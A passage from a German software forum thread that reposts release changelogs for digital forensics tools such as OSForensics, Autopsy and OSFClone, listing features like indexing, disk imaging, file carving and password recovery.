Fixed a bug where if the initial start failed (eg invalid target directory) the disabled buttons were not re-enabled, causing OSF to become un-usable
Misc:

Updated error message when trying to copy files to clipboard from non supported devices

[close]

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1007
Beitrag von: SiLæncer am 04 Mai, 2015, 09:06
Changelog

Case Log:
Added preliminary implementation of Case activity logging
Case Management:
Made add note window resizable
Added veritcal and horizontal scrollbars to Add note dialog, allowing more data to be saved and making it easier to format the notes.
Deleted files:
Fixed crash when displaying deleted file thumbnails on ext2/HFS+ drives (due to different threads sharing same drive handle)
Hash Sets:
Fixed bug in deleting hash set from Tree View
Web Browser:
Fixed missing URL info when adding web snapshot to case
WinPEBuilder:
Can pass in .cfg file to preload some values of WinPEBuilder.exe
Install to USB:
Updated GUI. If installing to USB Drive, then only USB location will be allowed. If creating a bootable device, then any folder is allowed. OSForensics will prefill the output destination of OSForensics (via WinPE Builder config file) when launching WinPE Builder (Requires WinPE Builder 1.0.107 and up).
Misc:
Updated System information library

[close]

http://www.osforensics.com/
Titel: OSForensics 3.2.1000
Beitrag von: SiLæncer am 10 Juni, 2015, 13:36
Changelog


    Create Index
        Added indexing of From, To, CC, BCC, etc. fields for PST attachments.
        Added indexing of From/CC/To etc. addresses from MSG attachments.
        Added missing support for indexing headers for MSG files
        The start and end dates for the advanced search options are now correctly using the current case timezone setting when a search is performed
        Fixed bug in Create Index -> Edit Template -> "Scan system paging and hibernation files" setting being lost.
        Fixed bug with Search Index -> Email Attachments -> Export ... results carrying incorrect From/To/CC information from previous results.
        Fixed bug with indexing attachments from MSG files (failing to recognize file type properly)
        Fixes for crashes and infinite loops when indexing corrupt DOC, XLS and PPT files.
        Fixed bug with empty emails in PST files causing previous buffer to be used for content and custom meta.
    Case Manager
        User can now specify whether logging is enabled/disabled when creating or editing a case
        Error message is displayed if the log file is corrupted or tampered with
        When generating a report Added "No title" to when there was no title for an item so the link to the file is visibly created
        When renaming (moving) cases, case items still used the old metafile path causing issues with non-existant paths. Fixed by reloading case after moving.
        E-mail attachment paths now include the attachment index number, due to the possibility of having multiple attachments with the same name
    Case Log
        Supplemental log entries added across all modules
        When logging is disabled, controls are now disabled and message is shown to the user
    Create/Verify Hash
        Fixed drive drop down list to include Case devices
    CSV Exports
        Removed "," separator between date and times for CSV exports so that Excel will automatically pick them up as dates
    Deleted Files
        Fixed bug with retrieving the clusters of a deleted NTFS file. This bug can potential cause an invalid memory access crash
        Unallocated cluster information now being used for mounted devices
        Fixed bug with unable to save multiple deleted files from a partition without a drive letter (due to invalid characters in the device path)
        The number of files that were not saved due to reallocation now displayed
        Improved performance of saving deleted NTFS files
        Deleted files stored in multiple MFT records are now being handled
        Proper stream names are being used when restoring a deleted NTFS file
    Disk Imaging
        Fixed no default drive being selected in 'Hidden Areas - HPA/DCO' tab
        Added check for no physical disk selected
        The sizes of each respective max LBA are now displayed in the log after detecting HPA/DCO
    Event Info
        Bug fix, stripped trailing space character from event title.
    Email Viewer
        A dotted border is now custom drawn on the selected folder/e-mail so that even when the control loses focus, the selection is still apparent
        Fixed not being able to add multiple e-mail attachments with the same name. Each attachment now has a unique path.
    File Name Search
        Added 'Save to disk' right-click option. Re-arranged right-click menu to be more readable
    Hash sets
        Files less than 5 bytes in size are now excluded from hash set lookups (this is to prevent tiny file (eg 0 byte files always appearing in a hash set where there was a 0 byte file on creation)
    Password Recovery (Windows Login Passwords)
        Added cached domain users to recovery for local drives
        Fixed a crash that could happen when recovering cached domain users
    Recent Activity
        Added timestamps to WLAN items for the associated XML profile or registry key (where available)
        Bug fix, export event to CSV will now include the item's title.
        Columns will remember their widths when filtering, sorting and navigating to different activity types.
    Search Index
        Added To/From/CC information to attachment output when searching an index
        Removed the from/to/cc fields from the CSV export of an search for items that aren't emails/attachments
        Fixed bug with broken links in search index results for files containing percent encoding in filename
    System Information
        Added cached domain users to "Get User Info (registry)"
    ThumbCache Viewer
        Fixed 'In Case' flag incorrectly displayed for all items in thumbnail view
    User Interface
        List/tree views across OSF now shows the selected item regardless of when the control loses focus
        Fixed drawing issues when minimizing navigation buttons
        Removed flickering when resizing window
        Fixed buttons not being displayed when resizing window
        Fixed drawing issues when resizing file/folder popup dialog
    WinPEBuilder
        Bug Fix. Selecting OSForensics or BurnInTest as the selected program in WinPEBuilder will now add the required WinPE packages on the WinPE/Packages tab.
    Misc
        Updated help for new Case Activity Log section to describe logging feature
        Updated help with info on user editable file carving configuration file, osf_filecarve.conf
        Updated help to mention timezone in case management
        Updated System information library

[close]

http://www.osforensics.com/
Titel: OSForensics 3.2.1001
Beitrag von: SiLæncer am 22 Juni, 2015, 12:19
Changelog
Case Manager

    E-mail attachment paths now include the attachment index number following the file name (eg. c:\email.pst*990*attach.txt:2). This is to distinguish multiple attachments with the same name.

Create Index

    Fixed some bugs relating to email attachments
    New URL format for attachments
    Fixed bugs with indexing attachments from mbox (.eml) in nested format
    Fixed bug with not indexing From/To details for Mbox attachments
    Fixed bug with indexing attachment titles incorrectly
    Fixed a bug that was causing "Failed to rename file zoom_pagedata.tmp to ..." appear at end of indexing

Email Viewer

    When extracting e-mail details, if FILETYPE_UNKNOWN is specified as the e-mail file type, the function will try opening the file with each format until successful
    Fixed potential heap corruption when exporting an e-mail with a large text body
    Fixed possible memory leak

Recent Activity

    Added shellbag item from registry files collection and display
    Fixed a date conversion issue with Google chrome downloads date

Search Index

    Fixed some results not being filtered into the correct tab (eg. images in e-mail attachments)
    E-mail attachments with the same name can now be distinguished properly
    When doing bulk adding of items to case, user is no longer prompted when the item already exists in the case after checking the 'Repeat action' checkbox.
    Fixed various problems related to adding nested attachments/e-mails/archives to case.
    For E-mail paths that do not have a message ID in the path, a message ID of "0" is assigned
    Fixed issues with the case flags not appearing for some items

Misc

    Fixed some date formatting bugs introduced in the previous build that were causing dates to appear blank
[close]

http://www.osforensics.com/
Titel: OSForensics 3.2.1002
Beitrag von: SiLæncer am 28 August, 2015, 09:05
Changelog
Create Index:

Improved MSG/EML/MBOX indexing support. Now using MIMETIC.
Fixed many common errors and warning messages and file recognition
Fixed many issues with .zip, .gz, and .tar.gz archives. And recursive archives.
Fixed filter buttons/checkboxes not working when viewing a failed/cancelled index
Added fix for "Core engine is not responding" when indexer was stuck in "Finishing" stage due to large index or slow disk write

Email Viewer:

Added right-click option to jump to the message ID of an e-mail file
Added progress details when scanning for deleted e-mails
fixed bug with deleted e-mails not being displayed in the EmailViewer
Fixed 'assert' error appearing when Subject field is missing in MIME headers

Index Log Viewer:

Fixed crash when trying to view a previous index log while an indexing job is running.

Recent activity:

Fixed an issue when trying to get IE10+ URLs from a read only drive
Fixed an issue with "dirty" IE10+ databases that were displaying a "Failed to attach IE10 database" error in some cases
Fixed an "autofill_dates" missing error caused by a Chrome update removing this table
Fixed a "malformed" database error when getting Chrome cookie information
Fixed some display and sorting issues with shellbag items on the file details tab

Registry Viewer:

Fixed a crash when opening a corrupt registry file

Misc:

exFAT partitions are now properly detected as opposed to being identified as "Unknown"
[close]

http://www.osforensics.com/
Titel: OSForensics 3.2 Build 1003
Beitrag von: SiLæncer am 07 Oktober, 2015, 12:21
Changelog
Create Index:

Added support for zipx, 7z, rar, .arj, .dmg, .iso, .chm, .cab, .bz2, .lzo
Fixed indexing bug with repeated "Core engine not responding" messages

Disk Imaging:

Reduced the vertical space used by the controls to support lower resolutions

EmailViewer:

Can now re-scan for recovered e-mails after cancelling a previously started scan
Removed 'Tools' menu

Misc:

Help updates for system information
[close]

http://www.osforensics.com/
Titel: Autopsy 4.0.0
Beitrag von: SiLæncer am 24 Januar, 2016, 13:00
(http://s26.postimg.org/mm0ohnggp/screenshot_130.jpg)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Whats new:>>

Multi-user cases supported that allow collaboration using network-based services.
Image Gallery feature released.
Assorted minor fixes and enhancements.

http://www.sleuthkit.org/autopsy/desc.php
Titel: OSForensics 3.3 Build 1000
Beitrag von: SiLæncer am 04 Februar, 2016, 12:32
Changelog

Case Management:

Increased Notes character limit to 64000 characters
Can now remove file from case in right-click menu
When adding an attachment to case that already exists, prompt the user to overwrite

Create Signature:

E-mail files are no longer saved as temporary files when creating a hash of the file. This improves the speed when creating a signature.
Fixed wrong directory path being displayed especially when hashing large files.
Fixed performance bug when hashing NTFS compressed files. Caused a 20x slowdown reading compressed files.

Compare Signature:

When comparing file attributes, mask out the extra attributes used by OSForensics Forensics mode (eg. FILE_ATTRIBUTE_ATTR_MODIFY). This gives a more accurate list of modified files.

Deleted File Search:

Added 'Remove deleted file from case' right-click menu option
Fixed search results clearing when flags are updated

Drive Preparation:

Added WAIT icon to drive refresh, so user can see when refresh is complete.
Fixed physical drives are now supported, including system drive. However, if the system drive is selected, an error message is displayed

Drive Imaging:

By default, 'Verify Image File' and 'Disable Shadow Copy' checkboxes are now checked.
Added option to attach Image metadata (.info) file to case on completion
Changed extension of Image metadata file from .info to .info.txt

Email Viewer:

When parsing DBX e-mail files in forensics mode, a temporary copy of the file is no longer created. This saves some time opening the file.

ESEDB viewer:

Updated the Extensible Storage Engine database (ESEDB) viewer to support the new Win10 file structure.
Fixed list of records being cleared when attempting to access a page that is out of bounds
Fixed bug with non NULL-terminated string
Added sanity check for endianness for Vista DBs due to possibility of fields being either big or little endian

File Indexer:

12x increased unique words capacity (from 16 million base words to 200 million). Allows more documents to be indexed in a single index.
Approximate 5x faster Forensics Mode indexing. This resulted from better caching, better parsing of the MFT and new low overhead methods of getting file attributes.
Improved JPG, PNG image indexing speed with new methods of calling exiftool. Performance is approximately 5x faster on photographic images.
Fixed bugs with indexing of archives (zip, tar, 7z, etc.) in Forensics Mode.
Added support for ZIP files using non-DEFLATE methods (e.g. IMPLODE)
Improved file type identifications and attempted indexing methods. At lot fewer warnings and errors should now be logged when indexing.
Fixed 64-bit bugs with 7z64.dll
Fixed corrupt messages e.g. "Error: Cannot delete output file: ... ". Sometimes this error was caused by indexing E-mails that contained malware. The antivirus (AV) solutions running on machines would detect the malware on extraction of attachments from the E-mail and unexpectedly delete the temporary file, causing a cascade of errors. We have a work around for the errors, but active AV solutions can still prevent indexing of files containing malware. Which can be a good or bad thing depending on your point of view.
Fixed failing to open .gz and .tar.gz files from forensic mode mounted drive
Fixed bugs with failing to extract files from certain problematic ZIPs and attempting every file (with magic and extraction and indexing) causing 3 error messages per file in the Zip file. Corrupted Zip files should no longer produce this cascade of errors.
Fixed crash bug with truncated MP3 files
Fixed OLE parsing bug when loading corrupted MSG Email file
Improved memory estimation of indexing, to better judge if there is sufficient RAM available to start the indexing job. No point starting an indexing job only to die half way through it.

File Name Search:

Fixed 'Current Folder' not being correctly displayed
Fixed search results clearing when flags are updated

File System Browser:

Display "(Sparse)" for the "Starting LCN" column of sparse files
Fixed incomplete folder size being displayed when folder size calculation is cancelled midway (eg. when items are being sorted)
Speed improvement when calculating folder sizes in forensics mode. Approx 3x faster depending on collection of files.

Internal Viewer:

File info: For reparse points the linked path is now displayed
No longer displays message box when failing to open file
Hex viewer, Display error message in the status bar when failing to open file

Mismatch Search:

Fixed 'Current Folder' not being correctly displayed

Password Recovery:

Fixed crash when writing an entry to the log
Windows Login - List views are now resized
Windows Login - Added 'Password Required' column to 'Local Users' table to indicate whether a password is required for login
Windows Login - Fixed crash when saving local users/domain users to file

Recent Activity:

Added file type sub classification for Windows Search Items. Files are classified using the MIME type and extensions
Removed directories from Windows Search Items
Fixed Security event log entries not appearing in the results
Selected items in 'File Details' and 'File List' tabs are now independent of each other. This caused problems when the exported list of selected items contain items that were not selected
Re-arranged the order of tabs so that 'File Details' is the default tab.
Fixed scan status not displaying in 'File Details' view
Fixed sorting of items in 'File Details' view
flickering of tree view
Fixed error message appearing when JumpList is not selected in the scan
Fixed a shellbag retrieval crash in Windows 10
Fixed a jumplist crash in Windows 10
Fixed a bug preventing some jumplist items from being retrieved
Changed "Stream Number" jumplist item name to "Entry ID"
Fixed an offset bug when getting the name of a shellbag item in Windows 10 which caused names with invalid characters to appear
Updated function that retrieves Windows desktop search terms. The database format recently changed in Win10 and broke older releases of OSF.

Registry Viewer:

Can switch between Hex, ASCII, Unicode in right-click menu
Hives under \Windows\System32\config\RegBack are now listed when selecting a registry hive to open
Added buttons for common operations (Add file, Add to case, Export, Find)
Fixed a crash when trying to view/open the SAM file in Windows 10

Search Index:

Updated search engine code to support new increased capacity index format with extended unique words.
Added 'Remove item from case' right-click menu option
Fixed search results clearing when flags are updated

Thumbnail View:

Improved performance of loading photographic image thumbnails in forensics mode. Is approx 10x faster.
Improved speed + memory usage when drawing thumbnails. Especially noticeable when scrolling the display, which should now be smoother.

Drive imaging:

Fixed error "Unable to read end of drive". This occurred when imaging a volume (e.g. Drive F:), when the size of the file system (e.g. NTFS) is smaller than the volume size. The imaging process will now continue beyond the end of the file system to read the entire volume.

Misc:

Fixed some memory leaks found by the leak checker

Licensing:

In the free edition of the software,
The indexing process will be restricted to 10,000 files or E-mails.
The search results from an index will be limited to 250 files per search.
Only 10 items to be added to each Case file.
Only the first 10 passwords from each browser type will be listed in the passwords function

Installer:

The installer package is now signed with an Extended Validation coding signing certificate. This avoids some SmartScreen installation warnings in Windows 10, like Windows "prevented an unrecognised app from starting".

[close]

http://www.osforensics.com/
Titel: OSForensics 3.3.1001
Beitrag von: SiLæncer am 09 Februar, 2016, 05:00
Changelog

Deleted Files Search

    File Carving, naming of recovered carved files has been changed to "Carved (type) file (Sector Location in HEX).extention" e.g. Carved 'jpg' file 0x00001F2B.jpg

File name search

    Fixed a bug that was preventing sort by foreground/background colour working correctly on results when OSForensics was using direct access (eg direct access of an image file)

Hash Sets

    Fixed a crash when first trying to open the hash sets tab

Misc

    Some help file updates

[close]

http://www.osforensics.com/
Titel: OSForensics 3.3.1002
Beitrag von: SiLæncer am 23 März, 2016, 13:00
Changelog

Deleted Files - FileCarving

    Fixed Crash. TIF file format has internal pointers to location within the file, when these pointer contains a corrupted/invalid value, it would possibly cause OSForensics to crash.
    Added slider to configuration to allow selection of start and end percent/location of drive to carve.
    Fixed possible crash when searching for HFS+ deleted files.

File Indexer

    New Zoom build, fixed issues with not starting indexing on HFS image with "Invalid folder" errors.

Misc

    Fixed retrieving file attributes on non-ntfs file systems
    Fixed possible crash when access HFS+ filesystem
    Added detection of file system for MBR partitions due to possible differences in reported partition type and actual file system

[close]

http://www.osforensics.com/
Titel: OSForensics 3.3.1003
Beitrag von: SiLæncer am 06 April, 2016, 18:00
Whats new:>>

Email Viewer

    Fixed stack overflow crash bug when saving MSG attachment with multiple levels of nesting

File Indexer

    New Zoom indexer build, fixed a crash bug for nested MSG files within PST files

http://www.osforensics.com/
Titel: OSFClone 1.1.1000
Beitrag von: SiLæncer am 07 April, 2016, 13:31
(http://s26.postimg.org/pq2mi8nix/screenshot_1018.jpg)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to use quickly and efficiently their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Whats new:>>

Updated Tiny Core Linux to Core 7.0
Updated dc3dd to 7.2.641
Added HFS+ support (If journalled is enabled, drive/partition is read only).
Updated libewf to 20160329
USB image of OSFClone is now UEFI/BIOS bootable

http://osforensics.com/tools/create-disk-images.html
Titel: OSForensics 3.3.1004
Beitrag von: SiLæncer am 13 April, 2016, 09:11
Changelog

Case Manager

    Added warning when attempting to add the entire image to case when there is a partition table
    Allow the option to select the "entire image file" when adding images to case

File Indexer

    New Zoom builds with added recognition for extensions .plt and .dxf to index filename only
    Fixed stack/buffer overflow issue when indexing PST emails.

Raw disk viewer

    When viewing the raw sectors of entire images, the partition table info is now decoded

Search Index

    Fixed special characters such as '&' in the filepath from the search results not being decoded properly

Misc

    Device dropdown list now includes the image file's partition (or "Entire image")
    Fixed bug with not being able to read the raw bytes of image files using UNC paths
    Accessing the entire image file with a valid partition table (ie. without specifying a partition) no longer returns error

[close]

http://www.osforensics.com/
Titel: OSFClone v1.1.1001
Beitrag von: SiLæncer am 06 Mai, 2016, 09:00
Whats new:>>

Fixed bugged where you may not be able to select partition as a source.
Will no longer mount the drive during scanning of available drives by default. As a consequence, OSFClone will no longer show disk space usage. To return to previous behavior, this can be re-enabled in the options.

http://osforensics.com/tools/create-disk-images.html
Titel: Autopsy 4.1.0
Beitrag von: SiLæncer am 24 Juli, 2016, 10:00
(http://s26.postimg.org/mm0ohnggp/screenshot_130.jpg)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Whats new:>>

New list view in Timeline tool
VMWare virtual machine files (vmdk) and Microsoft Virtual Hard Drives (vhd) can be added as data sources.
New ingest module detects vmdk and vhd files embedded in other data sources and adds them as data sources.
Text associated with blackboard artifacts is indexed and searched for keywords.
Custom (user-defined) blackboard artifact and attribute types are displayed in the UI and included in reports.
File size and MIME type conditions can be specified for interesting files set membership rules.
Assorted bug fixes and minor enhancements.

http://www.sleuthkit.org/autopsy/desc.php
Titel: Autopsy 4.1.1
Beitrag von: SiLæncer am 27 August, 2016, 16:00
Whats new:>>

Bug fix to enable some Python modules to run again.

http://www.sleuthkit.org/autopsy/desc.php
Titel: Firefox Autocomplete Spy 2.0
Beitrag von: SiLæncer am 08 September, 2016, 19:00
(http://securityxploded.com/images/firefoxautocompletespy_mainscreen.jpg)
Firefox Autocomplete Spy is the free tool to easily view and delete all your autocomplete data from Firefox browser. Firefox stores Autocomplete entries (typically form fields) such as login name, email, address, phone, credit/debit card number, search history etc in an internal database file.

'Firefox Autocomplete Spy' helps you to automatically find and view all the Autocomplete history data from Firefox profile location. For each of the entry, it display following details,

    Field Name
    Value
    Total Used Count
    First Used Date
    Last Used Date

You can also use it to view from history file belonging to another user on same or remote system. It also provides one click solution to delete all the displayed Autocomplete data from the history file. It is very simple to use for everyone, especially makes it handy tool for Forensic investigators.

Firefox Autocomplete Spy is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 10.

Whats new:>>

Mega edition with the support for Windows 10 version. Added more features like right click context menu & fixed the sizing problem with higher resolution computers.

http://securityxploded.com/firefox-autocomplete-spy.php

Titel: Autopsy 4.2.0
Beitrag von: SiLæncer am 28 Oktober, 2016, 19:00
(http://s26.postimg.org/mm0ohnggp/screenshot_130.jpg)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Credit card account search.
Encoding/decoding of extracted files to avoid anti-virus alerts/quarantine.
Ingest history used to warn before doing redundant analysis.
Options panel for managing custom tag names.
Options panel for setting external viewer associations.
Keyboard shortcut for applying Bookmark tags.
Improved PhotoRec carver ingest module cancellation responsiveness.
Results content viewer formats dates.
Update to PostgreSQL 9.5.
Assorted bug fixes and minor enhancements.

[close]

http://www.sleuthkit.org/autopsy/desc.php
Titel: OSForensics 4.0 Build 1000
Beitrag von: SiLæncer am 10 November, 2016, 17:00
Changelog

Password recovery:

Wifi passwords are now recovered & decrypted from the registry and file system.
Windows auto-logon password are now recovered & decrypted from registry.
Outlook & Windows live mail passwords are now recovered & decrypted.
Microsoft product keys are extracted from the Windows registry
New Configuration window has been added to allow the user to select what items are recovered, enter in an account password for offline decryption & select a dictionary for brute force attacks on the account password.
Specific rows in the password report can now be selected for export or adding to the case.
GPU accelerated hardware support for brute force password recovery on Office documents, PDF, Zip & RAR file. (Work in progress)
Support for new MS Office 2013 encryption standards for DOCX, PPTX, etc... (SHA512 hashing has been implemented in addition to SHA-1).
New columns in the report have been added for password strength & length, which can be useful when checking for compliance with password policies.
Added NTLM hash cracking to the common password check for the Windows login password
Added NTLM hash rainbow table generation.

User interface & work flow:

It is now possible to change the order of buttons in the left menu. Now called the Work Flow menu. This can allow the button order to reflect the chronological order of specific forensics processed.
Checkboxes in several windows rather than multi-select with having to continuously hold select/ctrl.
New 'File Details' tab in several windows that displays the search results in a list view.

Recent activity artifacts:

Added mobile backups, lists the backups found from iTunes (e.g. iPod, iPad, and iPhone).
Updates in Recent Activity for newer browsers (including Edge)
Faster collection of Window Search terms in recent activity (reducing hours to minutes for the worst case)
Added additional USB devices from SYSTEMCurrentControlSetEnumUSB in Recent activity
Added USB first connected time from parsing setupapi.dev.log
The ability to reorganize and/or hide show certain columns by right clicking on the column title area to configure it on the File Details tab was added.
GUI will show incrementing artefact count during the scan

File system support & imaging:

exFAT is now a supported
Added read-support for .Ex01, .Lx01, and .L01 image formats
Improvements to HFS+ support for Macs.
Added the ability for users to create Logical images from the Forensic Copy feature. Logical images are created as a .VHD virtual disk & can be remounted back into OSF or manipulated with 3rd party tools.
Added a log option for Forensics Copy
Added ability to supply multiple source paths when performing Forensic Copy
Owner/group/permissions are now preserved in Forensic Copy
Better exposed the function to compare shadow copies.

Memory viewer:

The Memory Viewer has been overhauled. Now has 47 columns of metadata for all processes.
Handles and loaded Modules are displayed per process when available
Users can create Process Specific binary dumps through right click options and add to the case.

ESEDB Viewer:

Dialog to select from a list of known files now shows the file size
Added right-click option to copy values (ie. cells) to clipboard
Added right-click option to view values (ie. cells) as binary data in the internal viewer
Added right-click option to export values (ie. cells) as binary data to file
Added right-click option to export values (ie. cells) as binary data to case
Added right-click option to export tables to case
Fixed some memory allocation issues when exporting tables that can cause a crash
Fixed horizontal scroll bar not appearing for some tables
Binary data is now displayed in byte groupings
Fixed a bug when retrieving a record multi-value

File name search:

The user can now edit the list of pre-sets by editing the FileNameSearchPresets.txt file (in the C:ProgramDataPassmarkOSForensics folder).
Peer to peer file types have been added as a new pre-set search selection.
The number of characters allowed in the search string field has been increased from 256 characters to 1023 characters.
Improved the default settings
Ability to group the search results by file type in 'File Details' view
When grouping the results by file type, the groups are collapsed by default

File indexing and searching:

Added image file EXIF header indexing for Camera Make Model, GPS date/time, GPS Latitude, and GPS Longitude
Improved relevance scoring when hundreds of matches are found within the same file
Restored torrent file indexing which got accidentally broken in a past release.
Fixed bug when indexing invalid file types (e.g. misnamed or corrupt files) causing incorrect content to be indexed.
Improved search results layout
Fixed bugs when indexing meta data (title, keywords, etc) from DOC files

Reporting & Case Management:

PDF output added.
New streamlined report layout, including a sidebar for quick access to specific forensic artifacts
Added option to include file EXIF metadata in the report
Custom Logos are now easier to added
Added two custom fields to Case Information (The Edit Case and New Case windows) & allow the user to rename the fields
Added and Add External report feature in case management will support adding an external HTML report directory to properly display other tools report.
Reduced the time required to populate the list of log entries
Index search history is now loaded on demand to reduce case load time.
File size of the case item is no longer retrieved to reduce case load time
The default mount name for volume shadows now contains the index number
When mounting devices, there is no longer an attempt to open a handle to the drive to reduce case load time.
When adding device to case, 'Case default device' checkbox is set by default
Improved error message when generating a report in a location that already contains an existing report
Fixed error when generating links in a report to a file that contains > 260 characters
Fixed forward slashes in links being escaped causing problems in some browsers (eg. Chrome)
Fixed error when deleting a read-only file from case
Fixed error when deleting a file with long file name from case
Added retry mechanism when attempting to add a file to case that is being used
When automatically adding files to case, added option to ignore future errors
Updated Report Templates to include the 'Case Activity Log' section in the main report
Added checkbox option to include 'Case Activity Log' into the main report
When generating a Case Log report, the exported log entries are exactly as displayed in the Case Log Viewer (ie. Verbosity, filters, sorting, etc applied)
Added a HTML Editor to allow user to modify case summary narrative. Can be located under "Edit Case Details".
Added progress bar when saving the case files to a folder before the case is deleted.
Added new report type 'Log Report' for Case Log reports

Shadow copies:

Fixed an issue when adding shadow copies to a case, if selecting an individual shadow copy it would store an incorrect Device path (eg Drive-C instead of Drive-C:) which would lead to it not being displayed on the analyze shadow copy dialog.
Added an Shadow Copy Analyze icon to start page
Stopped a shadow copy entities being compared against itself as it only makes sense to compare different shadows.
Added a warning message when opening the analyze dialog if no shadow copies were added to the case.

System information:

BitLocker Detection preset added to System Information
Updates to System information to detect new CPU types
Added Printer Info from registry for live/scan drive and Printer Info from (WinSpool) for Live Systems in the System Information module.

Registry Hive viewer:

Fixed a bug when opening a backup hive that was locked and a shadow copy was required to provide access.
Dialog to select from a list of known files now shows the file size

Hashing:

Button to add Hash results to case

Thumbnail database viewer:

Fixed large memory usage when reading Win10 thumbcache files.
Added support for Win10 thumbcache files. The Win10 thumbcache header uses a different format than previous versions
Added to list of known thumbnail cache files
Replaced thumbnail size radio buttons with combo box
Dialog to select from a list of known files now shows the file size

Internal file viewer:

Updated video previewer to support more video formats. Including video in these formats. 3GP, ASF, ADTS, MPEG-4, SAMI, AAC, WMA, DV Video, H.264/H.263, WMV
Can do screen capture from the File Viewer.

Email searching:

Added BCC searching for Emails.
Additional details are indexed when indexing Emails (for some formats).
Support for MIME UTF8 encoded FROM, TO, CC, BCC, SUBJECT fields in MBOX files

Deleted files:

Added a new checkbox for full disk / unallocated space carving. Previously only unallocated space was used for caving, as it is usually much faster. But in rare situations the full disk option can be useful (e.g. file slack space examination).
Added a new window showing the list of File Types that are carved (opened from within the config window). This list can be modified to add custom signatures by the user by editing the osf_filecarve.conf file.
Ability to group the search results by file type in 'File Details' view
When grouping the results by file type, the groups are collapsed by default

Other changes:

Added better time resolution, now fractions of seconds, in File Name Search/Mismatch Search/Deleted Search
Added support for Win10 prefetch files, which are compressed using lzxpress huffman stream encoding
Compare signatures can now display identical files. This is useful for duplicate file detection. There is a configuration dialog for specifying folders to exclude and file extensions to include.
Dozens of other bug fixes and minor usability improvements, including fixing a couple of crash bugs
Fixed up broken XP compatibility. This is very likely the last release we do that has any support for running on Window XP.
Populating the drive list (for drive preparation) is no longer performed on program startup to speed up load time
Loading of Magic config file (for mismatch search)is now performed on demand to speed up program load time
Populating the device list (for raw disk viewer) is no longer performed on program startup to speed up load time
When loading the log file (secure log), a buffer is now used to speed up load time

[close]

http://www.osforensics.com/
Titel: OSForensics 4.0 Build 1001
Beitrag von: SiLæncer am 17 November, 2016, 06:00
Changelog

Case Manager:

When generating report, fixed incorrect links being generated when 'Copy files' is checked
Improved the performance of adding items to case by performing the hash calculations all at once (rather than separately)
Improved the performance of updating case flags by not re-drawing the lists for File Name Search, Mismatch Search, Deleted File Search, Index Search, File System Browser
Allowed the HTMLeditor to be left opened from the "Edit Case Detail" dialog window. However, as a result, the case narrative is prevented from being edited from the New Case dialog procedure.

Case Log Viewer:

Improved the performance of adding new log entries

Decryption & Password Recovery:

Added Openoffice (LibreOffice) extensions to select file dialog
Removed bell sound from gpu client, cpu client, and server and replaced with a different (chime) sound
Fixed typo in default definition file

Forensic Copy:

Added a clear log button and started displaying the number of files copied
Reduced the amount of memory used substantially during the forensic copy process

Recent Activity:

Added Time Source Column for 'All'

[close]

http://www.osforensics.com/
Titel: OSForensics 4.0.1002
Beitrag von: SiLæncer am 01 Dezember, 2016, 09:19
Changelog

Activity Monitor
Added separate tasks for adding files to case
Case Manager
Fixed synchronization issues with hash table causing an exception to be thrown
Add file to case dialog has been changed to modeless, allowing the user to switch to another module while files are being added.
Added synchronization to CaseManager class to support concurrent access to case items
Added error message when creating/importing/loading/deleting a case while a task is still running
When closing the program, a warning dialog is displayed when any task is still running (as opposed to a select few tasks)
Fixed scroll bar being reset every time case items are added/removed
Adjusted the maximum text to 245K characters in the rich edit box for case narrative
Changed the case item list view to owner draw to improve performance
Decreased the time required to delete a large number of items from case
Fixed ‘re-use input’ checkbox not working when adding bookmarked files to case
Added error message when attempting to add bookmarked folders to case
Increased the frequency of progress updates when adding multiple files to case
Case items are now sorted by date in ascending order by default
Fixed bug when attempting to overwrite an existing external report in case
Fixed non-existent case default drive appearing in drop down box when editing case
Improved performance of updating list items (eg. in File Search, Mismatch Search, Deleted Search) when case flags are updated
Fixed memory leaks in case log
Decryption & Password Recovery
Added more info to display, client thread status, benchmark, password length and prefix. Adjusted job size for CPU clients.
Deleted Files Search
Fixed junk characters showing up in error message when prompting to overwrite a file
Fixed case flags not being updated in thumbnail view
Email Viewer
Fixed unhandled exception when failing to load e-mail file
File indexing and searching
Fixed bug with Doc/Ppt/Xls indexing „last modified“ as „Author“. Will now prioritize „Author“ and only index „Last modified“ if „Author“ is not available.
Added support for Comments property (appended to KEYWORDS meta tag) in DOC files, and support for „Category“ property (as „ZOOMCATEGORY“ meta tag) in PPT and XLS files
Raw Disk Viewer
Fixed bookmarks showing up twice when reloading a case
ThumbCache Viewer
Fixed ‘use same details for all’ checkbox not working when adding to case
Due to changes in Win10, the ‘name’ column should now show the thumbnail cache ID in hex format (instead of a cryptic string)
Misc
Updated HTML Editor to show character count

[close]

http://www.osforensics.com/
Titel: Autopsy 4.3.0
Beitrag von: SiLæncer am 19 Januar, 2017, 20:00
Changelog

Support for slack space on files (as separate virtual files) to enable keyword searching and other analysis
Simple mode for the file extension mismatch module that focuses on only only multimedia and executable files to reduce false positives
New view in tree that shows the MIME types
Tagged items are highlighted in table views
Ordering of columns is saved when user changes them
Support for Android devices with preloaders (uses backup GPT)
Support for images with no file systems (all data is added as unallocated space)
User can bulk add list of keywords to a keyword list
New "Experimental" module (activate via Tools, Plugins) with auto ingest feature
Assorted bug fixes and minor enhancements

